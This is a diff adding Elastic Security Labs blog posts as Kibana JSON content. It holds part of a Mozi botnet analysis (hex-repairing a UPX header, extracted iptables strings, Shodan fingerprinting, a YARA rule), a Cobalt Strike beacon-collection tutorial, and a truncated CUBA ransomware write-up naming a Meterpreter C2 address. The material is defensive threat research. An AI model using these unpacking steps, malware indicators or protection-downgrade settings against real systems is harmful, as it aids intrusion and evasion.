As we can see, it is just a UPX file as denoted by the UPX!.\n\n```\n$ vim truncated-87d3b.elf\n^?ELF^A^A^Aa^@^@^@^@^@^@^@^@^B^@(^@^A^@^@^@^PW^B^@4^@^@^@^@^@^@^@^B^B^@^@4^@ ^@^B^@(^@^@^@^@^@^A^@^@^@^@^@^@^@^@<80>^@^@^@<80>^@^@^Mà^A^@^Mà^A^@^E^@^@^@^@<80>^@^@^A^@^@^@°z^@^@°ú^F^@°ú^F^@^@^@^@^@^@^@^@^@^F^@^@^@^@<80>^@^@^Pñ<8f>RUPX!^\\\n```\n\n_Code block 7 - Corrupted Mozi sample in Vim_\n\nUsing the xxd plugin for Vim, we can convert this to HEX so that we can make our modifications. This is achieved by typing :%!xxd, which will show us the HEX output for the file.\n\n```\n00000000: 7f45 4c46 0101 0161 0000 0000 0000 0000 .ELF...a........\n00000010: 0200 2800 0100 0000 1057 0200 3400 0000 ..(......W..4...\n00000020: 0000 0000 0202 0000 3400 2000 0200 2800 ........4. ...(.\n00000030: 0000 0000 0100 0000 0000 0000 0080 0000 ................\n00000040: 0080 0000 0de0 0100 0de0 0100 0500 0000 ................\n00000050: 0080 0000 0100 0000 b07a 0000 b0fa 0600 .........z......\n00000060: b0fa 0600 0000 0000 0000 0000 0600 0000 ................\n00000070: 0080 0000 10f1 8f52 5550 5821 1c09 0d17 .......RUPX!....\n00000080: 0000 0000 0000 0000 0000 0000 9400 0000 ................\n00000090: 5e00 0000 0300 0000 f97f 454c 4601 7261 ^.........ELF.ra\n000000a0: 000f 0200 28dd 0001 0790 b681 0334 ee07 ....(........4..\n000000b0: ec28 04db 1302 0bfb 2000 031b be0a 0009 .(...... 
.......\n```\n\n_Code block 8 - Corrupted Mozi sample in Vim with XXD plugin_\n\nNext, we can just update bytes 0x84 - 0x8b (that we identified as having the zeroed-out p_filesize and p_blocksize) with the HEX value for p_info (7c2a 0400).\n\n```\n00000080: 0000 0000 7c2a 0400 7c2a 0400 9400 0000 ....|*..|*......\n```\n\n_Code block 9 - Updated p_filesize and p_blocksize HEX values_\n\nThen, let’s convert the file back to binary using :%!xxd -r, save the file, and exit Vim (:wq).\n\nFinally, let’s try to unpack the file now that we’ve manually adjusted the HEX values.\n\n```\n$ upx -d truncated-87d3b.elf\n Ultimate Packer for eXecutables\n Copyright (C) 1996 - 2020\nUPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020\n File size Ratio Format Name\n -------------------- ------ ----------- -----------\n 273020 <- 123165 45.11% linux/arm truncated-87d3b.elf\nUnpacked 1 file.\n```\n\n_Code block 10 - Successfully unpacked Mozi sample_\n\nWe have now successfully unpacked the file. Let’s check what kind of file we’re working with by using the file command.\n\n```\n$ file truncated-87d3b.elf\ntruncated-87d3b.elf: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped\n```\n\n_Code block 11 - File type identification of the Mozi sample_\n\nNow, we can again use the strings command to see if there is any useful information that we can use (truncated for readability).\n\n```\n$ strings truncated-87d3b.elf\n...\niptables -I OUTPUT -p udp --source-port %d -j ACCEPT\niptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT\niptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT\niptables -I INPUT -p udp --dport %d -j ACCEPT\niptables -I OUTPUT -p udp --sport %d -j ACCEPT\niptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT\niptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT\n0.0.0.0\n[idp]\nThis node doesn't accept 
announces\nv2s\ndht.transmissionbt.com:6881\nrouter.bittorrent.com:6881\nrouter.utorrent.com:6881\nbttracker.debian.org:6881\nnnn.nnn.nnn.nnn:6881\nabc.abc.abc.abc:6881\nxxx.xxx.xxx.xxx:6881\nyyy.yyy.yyy.yyy:6881\nNfZ\nOo~Mn\ng5=\nN]%\nRange: bytes=\nUser-Agent:\n...\n```\n\n_Code block 12 - Strings output from the unpacked Mozi sample_\n\nRunning Strings, we can see, among other things, network indicators and changes to the local firewall, iptables. There is a lot of great information in this file that we can now review and use to search for infected devices.\n\nNext, let’s enrich the ThreatFox data, store it in Elasticsearch, and visualize it with Kibana.\n\n## Storing threat data in the Elastic Stack\n\nLooking at what we’ve collected so far, we have rich threat data provided by ThreatFox that includes both network and file information. Additionally, we have actual malware samples collected from Malware Bazaar. Finally, we have performed static file analysis on the malware to identify additional indicators that could be of use.\n\nFor the next steps, we’re going to parse the data from ThreatFox and store it in the Elastic Stack so that we can leverage Kibana to visualize the data and identify clusters of activity.\n\n## Create the Ingest Node Pipeline\n\nWe're going to create an Ingest Node Pipeline to transform the data from ThreatFox into enriched Elasticsearch data. When making a pipeline, it's useful to make a table to lay out what we're going to do.\n\n| ThreatFox field | ECS-style field |\n| ---------------------------- | --------------------------------------------------------------- |\n| id | event.id |\n| ioc | threat.indicator.ip and threat.indicator.port |\n| threat_type | threat.software.type |\n| threat_type_desc | threat.indicator.description |\n| ioc_type | threat.indicator.type. 
Set threat.indicator.type to \"ipv4-addr\" |\n| malware | threat.software.name |\n| malware_printable | threat.threatfox.malware_printable |\n| malware_alias | threat.software.alias (if non-null) |\n| malware_malpedia | threat.software.reference |\n| confidence_level | threat.indicator.confidence |\n| first_seen | threat.indicator.first_seen |\n| last_seen | threat.indicator.last_seen |\n| reference | event.reference |\n| reporter | event.provider |\n| tags | tags |\n| `` | threat.indicator.geo. Enriched by our geoip processor. |\n| `` | file.hash.sha256 and related.hash |\n| `` | related.ip |\n\n_Table 1 - Elasticsearch Ingest Node Pipeline for ThreatFox data_\n\nTo create the pipeline, go to **Kibana Stack Management** -> **Ingest Node Pipelines** , then click **Create pipeline**.\n\n\n\nNext, we’ll give our pipeline a name, optionally a version, and a description.\n\nFrom this view you can manually add processors and configure them to your liking. To give you a head start, we've provided the [ThreatFox pipeline definition here](https://github.com/elastic/examples/blob/master/blog/mozin-about/ingest-node-pipeline.json) you can paste in.\n\nClick **Import processors** and paste the contents of this pipeline definition: [pipeline.json](https://github.com/elastic/examples/blob/master/blog/mozin-about/ingest-node-pipeline.json).\n\nWhen you click **Load and overwrite** , you'll have each processor listed there as we've configured it. 
From here you can tweak it to your needs, or just scroll down and click **Create pipeline**.\n\n\n\nAlternatively, if you’d like to use a turnkey approach, the [collection.sh](https://github.com/elastic/examples/blob/master/blog/mozin-about/collection.sh) script will allow you to collect the ThreatFox Mozi data, create the Elasticsearch ingest pipeline, the indicators index, and the index pattern, and send the data from ThreatFox directly into Elasticsearch.\n\n```\n$ git clone https://github.com/elastic/examples\n$ cd examples/blog/mozin-about\n$ sh collection.sh\n```\n\n_Code block 13 - Using the Mozi sample collection script_\n\nUsing the provided collection script, we can see the ThreatFox data is converted into the Elastic Common Schema (ECS) and sent to Elasticsearch for analysis.\n\n\n\n_Figure 3 - ThreatFox data in Kibana_\n\n## Analysis\n\nNow that we’ve collected our samples, enriched them, and stored them in Elasticsearch, we can use Kibana to visualize this data to identify clusters of activity, make different observations, and set up different pivots for new research.\n\nAs a few quick examples, we can identify some ports that are used and countries that are included in the dataset.\n\nLet’s start with identifying high-density network ports. Make a Lens visualization in Kibana by clicking on **Visualization Library** → **Create visualization** → **Lens**. We can make a simple donut chart to highlight that the threat.indicator.port of 6000 makes up over 10% of the network ports observed. This could lead us to explore other network traffic that is using port 6000 to identify other potentially malicious activity.\n\n\n\nOf note, ports 0 and 4000 are also observed and are interesting. None of ports 6000, 4000, or 0 are overly common on the Internet-at-large, so they could be used to identify other compromised hosts. 
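The port breakdown behind a chart like this can also be pulled straight from Elasticsearch with a terms aggregation. This is a sketch: the index name below is illustrative and should match whatever index the collection script created.

```
GET threatfox-indicators/_search
{
  "size": 0,
  "aggs": {
    "top_ports": {
      "terms": { "field": "threat.indicator.port", "size": 10 }
    }
  }
}
```

The response buckets list each port with its document count, which is the same data Lens renders as percentages.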
It should be noted that while transient network indicators like IP and port are useful, they should not be used as the sole source to identify malicious activity, irrespective of the intrusion set being investigated.\n\nNext, we can use a Kibana Maps visualization to identify geographic clusters of activity, and include associated context such as indicator confidence, provider, and type.\n\n\n\nSimilar to the commentary above on IPs and ports, geographic observations should not be the sole source used to take action. These are simply indicators for observed samples and require organization-centric analysis to ascertain their meaning as it relates to the specific network.\n\nUsing this information, we can make the following analytical assertions based on our sampling:\n\n- The Mozi botnet is currently active and maintaining steady infection rates\n- Port 6000 is a dominant port used for command & control\n- At least 24 countries are impacted, suggesting a global threat with no specific targeting\n- Clusters of specific ASNs in Bulgaria and India stand out with the highest volumes\n\nAs the analysis process starts to flow, it ends up providing additional avenues for research. One example an analyst may pursue is exploring the propagation mechanism through the use of HTTP fingerprinting.\n\n## Exploring the propagation mechanism\n\nIn the same manner that criminal fingerprints are tracked and logged in a database, a similar technique can be applied to publicly facing network infrastructure. An HTTP request can be sent to a webserver, and the HTTP response that is returned can be used to identify possible web applications hosted on the server; even the ordering of the fields in the HTTP response can be used as an identifier.\n\nOne thing we learned about Mozi’s spreading power is that each compromised device contributes to the infection of future victims. The compromised device starts an HTTP server that hosts a Mozi payload on a random TCP port. 
Knowing this information, we can collect content from an infected system to generate a fingerprint using cURL.\n\n```\ncurl -I nnn.nnn.nnn.nnn:53822\nHTTP/1.1 200 OK\nServer: nginx\nContent-Length: 132876\nConnection: close\nContent-Type: application/zip\n```\n\n_Code block 14 - HTTP response from a compromised device_\n\nBased on the observed response back, we can pull back some interesting information such as:\n\n- The use of an NGINX web server\n- No HTTP Date Header provided\n- The size of the file returned is close to 133 kilobytes\n\nWith this small amount of data, we can pivot to different search engines that store response data from these kinds of devices all over the world. By leveraging tools like [Shodan](https://www.shodan.io/), we can perform a search using the information obtained in the HTTP response. We’ll wildcard the Content-Length but use the same order for all of the HTTP response elements:\n\n```\nHTTP/1.1 200 OK Server: nginx Content-Length: * Connection: close Content-Type: application/zip\n```\n\n_Code block 15 - HTTP header for Mozi propagation_\n\nWe can see a number of hits where this same response was captured on other devices and start to pinpoint additional machines. Below are a few examples from a Shodan search:\n\n\n\nOther search examples over response data could be used as well such as the actual bytes of the malicious Mozi file that was returned in the response.\n\n## Mitigation\n\nThe Mozi botnet propagates through the abuse of default or weak remote access passwords, exploits and outdated software versions. 
To defend devices from exploitation, we recommend:\n\n- Changing the device default remote access passphrases\n- Updating devices to the latest firmware and software version supported by the vendor\n- Segmenting IoT devices from the rest of your internal network\n- Not making IoT devices accessible from the public Internet\n\n## Detection logic\n\nUsing [YARA](https://virustotal.github.io/yara/), we can write a signature for the corrupted UPX header. Similar to rules that look for specific types of PowerShell obfuscation, the obfuscation mechanism itself can occasionally be a better indicator of maliciousness than attempting to signature the underlying activity. It is extremely important to note that zeroing out part of the header sections was the technique that we observed with our samples. There is a litany of other obfuscation and anti-analysis techniques that could be used with other samples. MITRE ATT&CK® describes additional subtechniques for the [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/) technique from the [Defense Evasion](https://attack.mitre.org/tactics/TA0005) tactic. As noted above, the observed anti-analysis technique used by the analyzed Mozi samples consists solely of zeroing out the 8 bytes after the “UPX!” magic bytes (and the 4 bytes before that are always zero), so let's use a YARA signature derived from the work by [Lars Wallenborn](https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi/) (expanded for readability).\n\n```\nrule Mozi_Obfuscation_Technique\n{\n meta:\n author = \"Elastic Security, Lars Wallenborn (@larsborn)\"\n description = \"Detects obfuscation technique used by Mozi botnet.\"\n strings:\n $a = { 55 50 58 21\n [4]\n 00 00 00 00\n 00 00 00 00\n 00 00 00 00 }\n condition:\n all of them\n}\n```\n\n_Code block 16 - YARA signature detecting Mozi obfuscation_\n\n- 55 50 58 21 - identifies the UPX magic bytes\n- [4] - offset by 4 bytes, the l_lsize, 
l_version & l_format\n- 00 00 00 00 - identifies the program header ID\n- 00 00 00 00 - identifies the zero’d out p_filesize\n- 00 00 00 00 - identifies the zero’d out p_blocksize\n- condition - requires that all of the above strings exist for a positive YARA signature match\n\nThe above YARA signature can be used to identify ELF files that are packed with UPX and have the header ID, p_filesize, and p_blocksize elements zero’d out. This can go a long way in identifying obfuscation techniques in addition to Mozi samples. In our testing, we used this YARA signature with a 94.6% efficiency for detecting Mozi samples.\n\n## Summary\n\nThe Mozi botnet has been observed targeting vulnerable Internet of Things (IoT) devices to launch seemingly non-targeted campaigns that can take advantage of the force multiplication provided by a botnet. Mozi has been in operation since at least December 2019.\n\nWe covered techniques to collect, ingest, and analyze samples from the Mozi botnet. These methodologies can also be leveraged to enhance and enable analytical processes for other data samples.\n\n## Additional resources\n\n- Blog artifacts and scripts, Elastic: [https://github.com/elastic/examples/tree/master/blog/mozin-about](https://github.com/elastic/examples/tree/master/blog/mozin-about)\n- ThreatFox Indicator of Compromise Database, Abuse.ch: [https://threatfox.abuse.ch/browse](https://threatfox.abuse.ch/browse)\n- UPX Anti-Unpacking Techniques in IoT Malware, CUJOAI: [https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware](https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware)\n- Corrupted UPX Packed ELF Repair, vcodispot.com: [https://vcodispot.com/corrupted-upx-packed-elf-repair](https://vcodispot.com/corrupted-upx-packed-elf-repair)\n- UPX PACKED ELF BINARIES OF THE PEER-TO-PEER BOTNET FAMILY MOZI, Lars Wallenborn: 
[https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi](https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi)\n- Mozi, Another Botnet Using DHT, 360 Netlab: [https://blog.netlab.360.com/mozi-another-botnet-using-dht](https://blog.netlab.360.com/mozi-another-botnet-using-dht)\n- Mozi Botnet Accounts for Majority of IoT Traffic, Tara Seals: [https://threatpost.com/mozi-botnet-majority-iot-traffic/159337](https://threatpost.com/mozi-botnet-majority-iot-traffic/159337)\n- New Mozi P2P Botnet Takes Over Netgear, D-Link, Huawei Routers, Sergiu Gatlan: [https://www.bleepingcomputer.com/news/security/new-mozi-p2p-botnet-takes-over-netgear-d-link-huawei-routers](https://www.bleepingcomputer.com/news/security/new-mozi-p2p-botnet-takes-over-netgear-d-link-huawei-routers)\n- Kibana Maps, Elastic: [https://www.elastic.co/guide/en/kibana/current/maps.html](https://www.elastic.co/guide/en/kibana/current/maps.html)\n- Kibana Lens, Elastic: [https://www.elastic.co/guide/en/kibana/current/lens.html](https://www.elastic.co/guide/en/kibana/current/lens.html)\n"
+ },
+ "title": "Collecting and operationalizing threat data from the Mozi botnet",
+ "slug": "collecting-and-operationalizing-threat-data-from-the-mozi-botnet",
+ "date": "2022-06-02",
+ "description": "The Mozi botnet is an ongoing malware campaign targeting unsecured and vulnerable networking devices. This post will showcase the analyst journey of collecting, analyzing, and operationalizing threat data from the Mozi botnet.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "blog-thumb-mozi-botnet.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-collecting_and_operationalizing_threat_data_from_the_mozi_botnet-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_cobalt_strike_beacons_with_the_elastic_stack-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_cobalt_strike_beacons_with_the_elastic_stack-md.json
new file mode 100644
index 00000000000..701d9169ab9
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_cobalt_strike_beacons_with_the_elastic_stack-md.json
@@ -0,0 +1,38 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Collecting Cobalt Strike Beacons with the Elastic Stack\"\nslug: \"collecting-cobalt-strike-beacons-with-the-elastic-stack\"\ndate: \"2022-06-01\"\ndescription: \"Part 1 - Processes and technology needed to extract Cobalt Strike implant beacons\"\nauthor:\n - slug: derek-ditch\n - slug: daniel-stepanic\n - slug: seth-goodwin\n - slug: andrew-pease\nimage: \"photo-edited-01@2x.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - tutorial\n - cobalt strike\n - fleet\n---\n\n## Overview\n\n[Cobalt Strike](https://attack.mitre.org/software/S0154/) is a premium offensive security tool leveraged by penetration testers and red team members as a way to emulate adversary behavior. The goal is to validate security detection capabilities and processes replicating a real-world intrusion. While Cobalt Strike is a legitimate tool, it is often [abused by actual threat actors](https://www.proofpoint.com/uk/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware) as a way to gain and maintain persistence into targeted networks.\n\nTo manage command and control, Cobalt Strike leverages an implant that uses beacon configuration known as a [Malleable Command and Control](https://www.cobaltstrike.com/help-malleable-c2) (Malleable C2) profile. A Malleable C2 profile contains a tremendous number of options to configure the beacon’s functionality, please see [Cobalt Strike’s official documentation](https://www.cobaltstrike.com/help-beacon) for specifics on configuring Malleable C2 beacons.\n\nThis blog will focus on using the Elastic Stack to collect Cobalt Strike beacon payloads, extract and parse the beacon configurations, and an analysis of the metadata within the configurations. 
This will all be taken from the memory of targeted Windows endpoints that we’ve collected from our telemetry.\n\n## The Fleet Policy\n\n[Fleet](https://www.elastic.co/guide/en/kibana/current/fleet.html) is an app in Kibana that provides a central place to configure and monitor your Elastic Agents. Fleet uses [integrations](https://www.elastic.co/guide/en/fleet/current/integrations.html), which are unified plugins that allow data to be collected from apps and services, and then stored in Elasticsearch. Integrations are added to policies, and Elastic Agents are enrolled in policies.\n\nFirst, we need to configure the collection of shellcode and malicious memory regions in a Fleet policy. This will collect 4MB of data from memory surrounding shellcode and malicious memory events. It should be noted that this collection may significantly increase the amount of data stored in Elasticsearch.\n\nYou can add this to an existing policy or create a new policy. To create a new policy, in Kibana, navigate to Fleet → Agent Policies → Create agent policy. Give your policy a name and description. Optionally, you can disable “System monitoring” and “Agent monitoring” to reduce the amount of system and agent metadata collected from your endpoints. Click on “Create agent policy”.\n\n\n\nNext, click on your new policy and click the “Add integration” button.\n\n\n\nFinally, we’re going to add the memory and shellcode collection options. Click on the integration name (“Endpoint Security”).\n\n\n\nUnder “Protections”, leave the different protection types selected, but change the Protection level from “Prevent” to “Detect”. This will allow malware to continue to run, allowing for richer event collection. There are several types of Protections (Malware, Memory, etc.); select “Detect” for each type that has Windows as an available “Operating system”; you can uncheck Mac and Linux Operating Systems. 
**If you are enabling this feature for a production environment, leave the Protection levels as “Prevent”.**\n\n\n\nAt the bottom of the integration configuration page, you can toggle “Register as antivirus” so that the Elastic Agent is registered as the Antivirus solution, and disable Windows Defender. Click on “Show advanced settings”.\n\n\n\nAt the very bottom of the advanced settings page, type “true” for the windows.advanced.memory_protection.shellcode_collect_sample and windows.advanced.memory_protection.memory_scan_collect_sample settings, and then click “Save integration”.\n\n\n\nOnce you have created this specific Fleet policy, you can apply this policy to an endpoint running the Elastic Agent. For specific instructions on how to deploy the Elastic Agent, refer to the [official Elastic documentation](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html#install-fleet-managed-agent).\n\n## Collecting the Beacon\n\nNow that we’ve made a collection policy and applied it to a Windows machine, you can target it with a Cobalt Strike campaign. Instead of mimicking what a Cobalt Strike beacon could look like in a lab, we’re going to use live Cobalt Strike beacon payloads from Elastic’s telemetry.\n\nTo find Cobalt Strike beacon payloads, you can use the Discover app in Kibana to return events identified as Cobalt Strike. These events are provided by the Elastic Endpoint Security Agent, which identifies Cobalt Strike beacons and modules with the “Windows.Trojan.CobaltStrike” malware signature. 
A simple [Kibana Query Language (KQL)](https://www.elastic.co/guide/en/kibana/current/kuery-query.html) search is as simple as:\n\n```\nKQL search for Cobalt Strike\n\nevent.category:(malware or intrusion_detection) and\nrule.name:(Windows.Trojan.CobaltStrike or Windows.Trojan.Cobaltstrike)\n```\n\n\n\nNext, let’s filter on documents that have the process.Ext.memory_region.bytes_compressed field (this is a field populated by the windows.advanced.memory_protection.shellcode_collect_sample and windows.advanced.memory_protection.memory_scan_collect_sample settings we configured in the Fleet policy above). To do that we can simply add a filter for the process.Ext.memory_region.bytes_compressed_present field with a value of true.\n\n\n\nFinally, add the process.Ext.memory_region.bytes_compressed field to our view so that we can see the value of the field.\n\n\n\nWe can see that we have 133 examples with data in the process.Ext.memory_region.bytes_compressed field. This field contains the file extracted from the memory of the infected host and then zlib deflated and Base64 encoded.\n\n\n\nNow that we’ve collected the file in the Elastic Stack, let’s turn that raw data into a file that we can analyze.\n\nThere is a lot of nuance between operating systems on how to decode Base64 and inflate zlib deflated files. If you’d prefer to use your command line or local tools, feel free to do so. 
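For example, the decode-and-inflate steps can be reproduced with a short shell pipeline. This is a sketch: beacon.b64 stands in for a copied process.Ext.memory_region.bytes_compressed value, so we first generate a demo value in order to run the pipeline end to end:

```shell
# Build a demo bytes_compressed value (zlib-deflated, then Base64-encoded),
# standing in for the field value copied out of Kibana.
printf 'MZ-demo-beacon-bytes' | python3 -c 'import base64,sys,zlib; sys.stdout.buffer.write(base64.b64encode(zlib.compress(sys.stdin.buffer.read())))' > beacon.b64

# Reverse the encoding: Base64-decode, then zlib-inflate, to recover the raw bytes.
python3 -c 'import base64,sys,zlib; sys.stdout.buffer.write(zlib.decompress(base64.b64decode(open("beacon.b64","rb").read())))' > beacon.bin

cat beacon.bin   # prints: MZ-demo-beacon-bytes
```

For a real field value, beacon.bin would be the same PE file that the CyberChef steps below produce.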
That said, [CyberChef](https://gchq.github.io/CyberChef) is a browser-based data parser that is provided for free by the United Kingdom’s Government Communications Headquarters (GCHQ).\n\nUsing the CyberChef web application, add the “From Base64” and “Zlib Inflate” recipes, and then paste the contents of the process.Ext.memory_region.bytes_compressed field into the input.\n\nClick on the disk icon to download the inflated binary.\n\n\n\nRunning the file command, we can see that this is a Portable Executable (PE) file that can be analyzed by a malware reverse engineer (RE).\n\n```\nUsing the file command to validate the file type\n\n$ file beacon.exe\n\nbeacon.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\n```\n\nWhile an RE can identify a tremendous amount of information, let’s explore what additional information a non-RE can obtain from this file.\n\n## Next Steps\n\nIn the next [release](https://www.elastic.co/security-labs/extracting-cobalt-strike-beacon-configurations), we’ll use the beacon that we’ve just collected and extract its configuration. With this information, we’ll be able to identify other important elements such as license identifications, watermarks, and atomic indicators.\n"
+ },
+ "title": "Collecting Cobalt Strike Beacons with the Elastic Stack",
+ "slug": "collecting-cobalt-strike-beacons-with-the-elastic-stack",
+ "date": "2022-06-01",
+ "description": "Part 1 - Processes and technology needed to extract Cobalt Strike implant beacons",
+ "author": [
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "photo-edited-01@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "tutorial",
+ "cobalt strike",
+ "fleet"
+ ]
+ },
+ "id": "security_labs_content-collecting_cobalt_strike_beacons_with_the_elastic_stack-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_campaign_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_campaign_analysis-md.json
new file mode 100644
index 00000000000..622fbdd742c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_campaign_analysis-md.json
@@ -0,0 +1,41 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"CUBA Ransomware Campaign Analysis\"\nslug: \"cuba-ransomware-campaign-analysis\"\ndate: \"2022-09-08\"\ndescription: \"Elastic Security observed a ransomware and extortion campaign leveraging a combination of offensive security tools, LOLBAS, and exploits to deliver the CUBA ransomware malware.\"\nauthor:\n - slug: daniel-stepanic\n - slug: derek-ditch\n - slug: seth-goodwin\n - slug: salim-bitam\n - slug: andrew-pease\nimage: \"blog-thumb-hard-drives.jpg\"\ncategory:\n - slug: campaigns\ntags:\n - ref9019\n - cuba\n - ransomware\n---\n\n## Key Takeaways\n\n- The Elastic Security Team is tracking an organized and financially-motivated ransomware and extortion group called Cuba Ransomware\n- Cuba Ransomware targets small and medium-sized retailers, exfiltrating sensitive information, and then deploying ransomware\n- Cuba Ransomware uses a “name and shame” approach by releasing exfiltrated data as an additional method to extort ransomware cryptocurrency payments\n- We are releasing a YARA signature and providing hunting queries that detect this ransomware family\n\n> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:\n>\n> - [CUBA Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)\n> - [BUGHATCH Malware Analysis](https://www.elastic.co/security-labs/bughatch-malware-analysis)\n\n## Preamble\n\nThe Elastic Security Team is tracking a threat group that is leveraging the Cuba Ransomware, combined with data exfiltration and extortion, to target North American and European retailers and manufacturers for cryptocurrency payments. The threat group has followed an effective, but repetitive cluster of TTPs for initial access, lateral movement, exfiltration, ransomware deployment, and extortion.\n\n## Initial Access\n\nThe incidents that we have observed included hosts that were infected with a litany of initial access opportunities. 
These included everything from potentially unwanted programs (PUP) to remotely executable vulnerabilities. Because of this, we cannot verify what the initial access vehicle was, but there are two theories:\n\n- An access broker\n- A remotely exploitable vulnerability\n\nWhile there are many ways to gain access into a targeted network, we’ll explore the most likely hypotheses for how the CUBA threat group gained access.\n\n### Access Broker\n\nAs an introduction, an access broker is a threat group whose “actions on objective”, as they move through the [kill chain](https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html), are to collect and maintain remote access into a targeted network so that the access can be sold to other threat groups with different goals.\n\nThis is a common tactic for ransomware campaigns where the goal is to rapidly encrypt and extort victims into paying to recover data. When using ransomware kits (ransomware-as-a-service), the threat actors are often focused on moving rapidly across many victims and not on the reconnaissance required to identify and exploit victims to deploy their ransomware.\n\nRansomware-as-a-service includes a lot of overhead such as negotiating with victims, troubleshooting unlock procedures, and managing the cryptocurrency infrastructure. It is often easier to purchase previously exploited systems that allow the ransomware campaign owners to be “shell wranglers” instead of needing to gain and maintain access to a large number of environments.\n\nThe theory that an initial access broker may have been used began percolating because we observed access attempts using an Exchange vulnerability in multiple contested networks; however, not all networks received the CUBA ransomware. 
Additionally, we observed initial access attempts in January but did not observe CUBA ransomware until March, which would align with an access broker gaining and maintaining persistence while shopping for a buyer.\n\nIn the environments where the CUBA ransomware was not deployed, the incident response was rapid but incomplete, and the adversary regained access. Once the persistence was observed, the adversary was successfully evicted and CUBA was never deployed.\n\n### Remotely Exploitable Vulnerability\n\nWe observed the execution of the ProxyLogon exploit. [Previous research](https://www.mandiant.com/resources/unc2596-cuba-ransomware) has observed this threat group leveraging [ProxyLogon](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855) and [ProxyShell](https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers) vulnerabilities to gain initial access.\n\n```\nc:\\windows\\system32\\inetsrv\\w3wp.exe, -ap, MSExchangeOWAAppPool, -v, v4.0, -c, C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config, -a, \\\\.\\pipe\\[redacted], -h, C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config, -w, (empty), -m, 0\n```\n\nIn each case REF9019 activity was traced back to Windows servers running Microsoft’s Exchange Server. 
Although we do not have information on the patch levels of those machines at the time of the execution or the exact vulnerabilities exploited, there is corroborating evidence regarding the exploitation of publicly accessible Exchange servers at this time generally, as well as specific reporting tied to the CUBA threat actor exploiting them.\n\nThis information combined with the lack of activity preceding this event, as well as the order of tactics after, indicates that in both cases exploitation of publicly accessible Exchange servers initiated the compromise.\n\n> While analyzing certain alerts throughout these events, we used data present in the process.Ext.memory_region.bytes_compressed field, and the technique we described in our [Cobalt Strike series](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack), to extract the memory-resident binaries and shellcode.\n\n## Establish Foothold\n\n### afk.ttf\n\nThis exploitation attempt preceded one primary infection by about 6 weeks. It appears a tactics shift occurred in the intervening period.\n\nThe file afk.ttf has been identified as a variant of “ZenPak” by some vendors on VirusTotal. ZenPak is categorized as a generic Trojan which has been associated with the Bazar malware family. The BazarBackdoor has a long history and was recently sighted in ransomware-as-a-service campaigns.\n\nInitially, afk.ttf was identified through a malicious_file alert when it was created by the IIS worker process (w3wp.exe) handling the Exchange Service.\n\n\n\nThe afk.ttf file is a 64-bit Windows DLL that has a single export, bkfkals. Next, afk.ttf is loaded by rundll32.exe (spawned by w3wp.exe) which unpacks shellcode in memory and executes it. 
The unpacked shellcode is a Meterpreter payload from the offensive security framework, [Metasploit](https://github.com/rapid7/metasploit-framework).\n\n\n\nFollowing this, afk.ttf uses an injection technique that allows the injected code to run before the entry point of the main thread of the process. This is known as [Early Bird injection](https://www.cyberbit.com/endpoint-security/new-early-bird-code-injection-technique-discovered/) and is used in this situation to inject the shellcode in a suspended process for nslookup 8.8.8.8. Once the shellcode was deobfuscated for execution, the Elastic Agent identified and prevented the Metasploit payload.\n\n\n\nUsing the process.Ext.memory_region.bytes_compressed field we were able to recover the memory snapshot from these two alerts and verified that the shellcode was Meterpreter, which is part of the Metasploit framework. Additionally, we were able to extract the C2 IP (159.203.70[.]39) and URI (/Time/cb6zubbpio...truncated...).\n\n\n\nUltimately this foothold was either never established, or abandoned because there is no further activity from this endpoint until it is re-exploited about 6 weeks later.\n\n### add2.exe\n\nThe primary execution chain of both infections started with a malicious_file 